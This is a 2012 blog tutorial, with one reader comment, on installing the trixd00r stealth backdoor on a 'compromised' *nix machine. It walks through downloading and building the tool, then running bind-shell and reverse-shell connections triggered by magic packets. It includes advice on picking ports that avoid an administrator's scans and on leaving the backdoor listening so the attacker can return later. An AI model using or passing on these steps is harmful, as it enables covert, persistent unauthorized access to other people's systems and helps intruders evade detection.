Wednesday 10 October 2012

Hey what's up everybody, this is my first tutorial so bear with me. Rolleyes

Trixd00r is a great little tool from the guys over at nullsecurity that is a very stealth backdoor on any *nix system. It's got a server and a client so obviously to use this you would already have access to the box, but you need to come back later or something so trixd00r is perfect for that.
Also, to run the server on the compromised machine you will need to either be root, or w/e user you are to be in the sudoers file and know their password.


Alright moving on, go ahead and grab the tar file...

Code:
wget http://www.nullsecurity.net/tools/backdoor/trixd00r-0.0.1.tar.gz

Untar it...

Code:
tar -zxvf trixd00r-0.0.1.tar.gz

Go to the newly created directory...

Code:
cd trixd00r-0.0.1

Okay so now we will type the command make to get some output for the installation directions, and you will get the following:

[Image: trix.png]

Okay so as you can see it gives us the option to install on quite a few different OS's, in this case I will choose Linux.

Code:
make linux

Alright so it should spit some stuff on your screen and when you do an ls command you should have some new goodies in the directory.

[Image: trix2k.png]

Note*
If you are using this on OS X, choose linux...you will need to have the command line utils installed though, just go to github and get the prepackaged gcc installer if you don't have time or don't want to download Xcode, otherwise you get an error about no gmake/make being present.
Oh and if linux complains about no gmake too, just make a symbolic link between make and gmake. ln -s /usr/bin/make /usr/bin/gmake

The great thing about trixd00r is that the server (compromised machine) listens invisibly for "magic packets" sent from the client (attacker) and when it gets those packets it will either bind a shell on a tcp/udp port of our choosing or connect back to us again using either protocols.

Good job, we have the server (trixd00rd) and the client (trixd00r) ready for use. Now to the fun stuff!


Trixd00r Bind Connection
Now we need to set up our trixd00rd on the compromised machine, to do that we run sudo ./trixd00rd -H to get a list of options.

[Image: trix4.png]

Note*
A really cool feature is you just put a ? after the option to see it needs.

So first off the -i flag is for the interface connected to the web that we'll be using...pretty self explanatory.

And sudo ./trixd00rd -i en1 -t ? would get me...

[Image: trix5.png]

The default is the TCP SYN packet which I'm just going to leave it...the other protocols are the same process as this one, I'll leave it up to you to play with them and discover why one would be more advantageous than the others, situational dependent.
If you don't know the different protocols and how they work, I recommend reading up on them due to the fact that they're just good to know. Not understanding even basic tcp/ip (i'm no expert) is just ignorant, especially when it's fun to learn about, and hacking/pentesting and information security has so much do with it.


The -s flag is which shell mode we want to use, again I used a ? to see the different options...in this case we are using the TCP Bind option, which will be -s 0

[Image: trix34.png]

Alright the two options above (-t and -s) are the most important, so I will show you the rest of the options I used, a picture and then explain them below.

sudo ./trixd00rd -i en1 -t 0 -s 0 -b <port> -v

[Image: trix88.png]

-b 2302 This is the port that our listener will be bound to, waiting for the magic packet to give us our shell. The default is 31337, which comes up as "Elite" on a port scan, so if the admin, or user or whoever runs a scan because he's security minded he will see that port open which is known to be a trojan/backdoor/RAT/etc so I always change my backdoor ports to shit that is a game app or some obscure port that has nothing to with any of the above - out of sight, out of mind.
^^^The only time this will come up on a port scan is when you are actually interacting with trixd00rd, any other time and it will just show up as closed, or filtered to an outsider - that's why this is so stealthy! Thumbsup

-v The -v option is for verbosity, I like to see output to know what is going on and if something goes wrong it will say in plain english.

Our server is waiting for the magic packets, so now we go to our client and interact with the shell!

./trixd00r -h <target IP> -t 0 -s 0 -p <port> -m <passphrase> -v

[Image: trix87.png]

-h 192.168.1.3 This tells trixd00r where to send the packet to get our shell.

-t 0 and -s 0 have to match up with trixd00rd - for obvious reasons.

-p 2302 This tells trixd00r which port the server is listening on.

-v Again, verbosity.


And we're done. If all went well, you'll get a nice welcome banner like the one below, and a prompt waiting for input!

[Image: trix12.png]

Trixd00r Reverse Connection


Now everything is pretty much the same as above except a few options, so instead of explaining everything I will just show you the commands, a picture and explain the options that changed.

For the server, we will drop the -b <port> option and add the -c <connect back host IP> and change the -s from 0 to 1 (indicating we want a reverse connection instead of a bind shell) like so.


sudo ./trixd00rd -i en1 -t 0 -s 1 -c <connect back IP> -v

[Image: trix66.png]

For the client, we do the same as above, except there is no need for a -c option because the server is connecting back to us.

./trixd00r -h <target IP> -t 0 -s 1 -v

[Image: trix100.png]

Voila, perfect reverse shell connection.


Closing the Connection

To COMPLETELY close the connection we use control+C on the client and then add -m byebye and hit enter, it will tell you that it sent the magic packet which means the connection was closed and now the server is NOT listening anymore.
[Image: bybye.png]

Server side if you send the byebye packet it will look like this...
[Image: trix14.png]

To keep the server listening on the compromised machine so you can come back later, just hit control+C on the client but do not send the byebye packet.



Credits

Aight that's it, hope you enjoyed the tutorial! All credits go to http://www.nullsecurity.net for making trixd00r and also to their youtube video where I got all the info to make this.

I'm not an expert with this tool, although it's not like it's really complicated, but if you have any questions about it I'm glad to help...also lemme know how you liked the tutorial.

Thanks for reading, and have a good day.

1 comment:

  1. its not work.

    +-----------------------------------------+
    | trixd00r - http://www.nullsecurity.net/ |
    +-----------------------------------------+
    [+] checking arguments
    [+] building magic packet
    [+] sending magic packet

    ........................
    wheres shell ? +_+

    ReplyDelete

CEX.io